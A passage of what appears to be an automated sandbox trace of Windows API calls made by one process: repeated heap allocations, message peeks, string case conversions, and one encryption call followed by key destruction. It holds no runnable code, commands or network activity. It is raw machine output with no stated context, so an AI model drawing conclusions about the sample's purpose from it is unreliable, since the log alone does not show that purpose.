[0260.260] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.260] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.261] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0260.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0260.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.261] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0260.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0260.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.261] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24c6e98*, pdwDataLen=0x8bef68*=0x7a1a, dwBufLen=0x7a20 | out: pbData=0x24c6e98*, pdwDataLen=0x8bef68*=0x7a20) returned 1 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0260.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0260.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.264] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.264] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.264] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.264] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.264] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.264] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.264] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.265] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.265] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.265] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.265] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.265] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.265] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.266] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.266] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.266] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0260.266] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.266] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.266] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0260.267] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.267] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.267] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.268] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.268] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.268] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0260.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.270] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0260.270] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.270] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0260.271] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.271] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0260.271] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.271] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.271] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.271] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.272] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.272] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.272] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.272] CryptDestroyKey (hKey=0xaa5860) returned 1 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.273] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.273] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.273] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.273] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.274] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.274] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.274] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.274] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.274] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.275] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.275] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.275] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.275] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.275] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.275] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.275] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.275] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.275] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.275] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.276] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.276] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.276] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.276] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, 